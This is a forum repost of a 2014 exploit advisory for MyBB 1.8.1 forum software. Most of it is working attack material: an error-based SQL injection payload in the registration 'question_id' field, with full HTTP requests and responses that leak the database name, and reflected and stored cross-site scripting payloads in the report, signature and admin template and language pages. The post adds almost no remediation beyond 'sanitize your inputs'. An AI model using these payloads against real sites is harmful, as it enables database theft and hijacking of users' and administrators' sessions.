Active Members akkiliON Posted November 14, 2014 Active Members Report Share Posted November 14, 2014 #Title: MyBB 1.8.X - Multiple Vulnerabilities#Date: 13.11.2014#Tested on: Linux / Apache 2.2 / PHP 5 (localhost)#Vendor: mybb.com#Version: => 1.8.1 - Latest ATM#Contact: smash@devilteam.pl#Author: Smash_Latest MyBB forum software suffers on multiple vulnerabilities, including SQL Injection and Cross Site Scripting. Such bugs may allow attacker to perform remote sql queries against the database, and so on.Sanitize your inputs 1. SQL InjectionVuln:POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1##1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):POST /mybb-1.8.1/member.php HTTP/1.1Host: localhostContent-Type: application/x-www-form-urlencodedContent-Length: 408regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register#1 - Response:HTTP/1.1 503 Service Temporarily UnavailableDate: Thu, 13 Nov 2014 15:16:02 GMT <div id="content"> <h2>MyBB SQL Error</h2> <div id="error"> <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl><dt>SQL Error:</dt><dd>1054 - Unknown column '9' in 'order clause'</dd><dt>Query:</dt> SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#' </dd>#2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):POST /mybb-1.8.1/member.php HTTP/1.1Host: localhostContent-Type: application/x-www-form-urlencodedContent-Length: 409regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register#2 - Response:HTTP/1.1 200 OKDate: Thu, 13 Nov 2014 15:21:15 GMT(...)<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register --><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Forums - Registration</title>#3 - Request (Final POC):POST /mybb-1.8.1/member.php HTTP/1.1Host: localhostContent-Type: application/x-www-form-urlencodedContent-Length: 475regcheck1=®check2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1415880544&step=registration&action=do_register#3 - Response:HTTP/1.1 503 Service Temporarily UnavailableDate: Thu, 13 Nov 2014 15:24:34 GMT(...) <div id="content"> <h2>MyBB SQL Error</h2> <div id="error"> <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl><dt>SQL Error:</dt><dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd><dt>Query:</dt><dd> SELECT q.*, s.sid FROM mybb_questionsessions s LEFT JOIN mybb_questions q ON (q.qid=s.qid) WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#' </dd></dl>(...)2. Cross Site Scripting a) Reflected XSS - Report postVuln:GET 'type' - XSS"><script>alert(666)</script>localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1Request:GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1Host: localhostResponse:HTTP/1.1 200 OKSet-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnlyContent-Length: 1247Content-Type: text/html<div class="modal"> <div style="overflow-y: auto; max-height: 400px;" class="modal_0"> <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);"><input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" /><input type="hidden" name="action" value="do_report" /><input type="hidden" name="type" value="XSS"><script>alert(666)</script>" /><input type="hidden" name="pid" value="0" /> Stored XSS - SignatureVuln:POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]#1 - Request (change signature):POST /mybb-1.8.1/usercp.php HTTP/1.1Host: localhostReferer: http://localhost/mybb-1.8.1/usercp.php?action=editsigContent-Type: application/x-www-form-urlencodedContent-Length: 203my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature#2 - Request (user's profile):GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1Host: localhostReferer: http://localhost/mybb-1.8.1/usercp.php?action=editsig#2 - Response:HTTP/1.1 200 OKSet-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnlyContent-Length: 12740Content-Type: text/html; charset=UTF-8(...)<table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed"><tr><td class="thead"><strong>user's Signature</strong></td></tr><tr><td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td></tr></table><br /> c) Reflected XSS - Templates (AP)Vuln:GET 'title' - title"><script>alert(666)</script>localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1Request:GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1Host: localhostResponse:HTTP/1.1 200 OK(...)<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1"> <title>Editing Template: calendar"><script>alert(666)</script></title> d) Reflected XSS - Languages (AP)Vuln:GET 'file' - <a onmouseover=alert(666)>wootlocalhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit?=english&editwith=&file=<a onmouseover=alert(666)>wootRequest:GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit?=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1Host: localhostResponse:HTTP/1.1 200 OK(...)<a href="index.php?module=config-languages">Languages</a> » <a href="index.php?module=config-languages&action=edit?=english">English (American)</a> » <span class="active"><a onmouseover=alert(666)>woot</span>(...)<div class="title"><a onmouseover=alert(666)>woot</div>Surs?: http://www.exploit-db.com/exploits/35224/ Quote Link to comment Share on other sites More sharing options...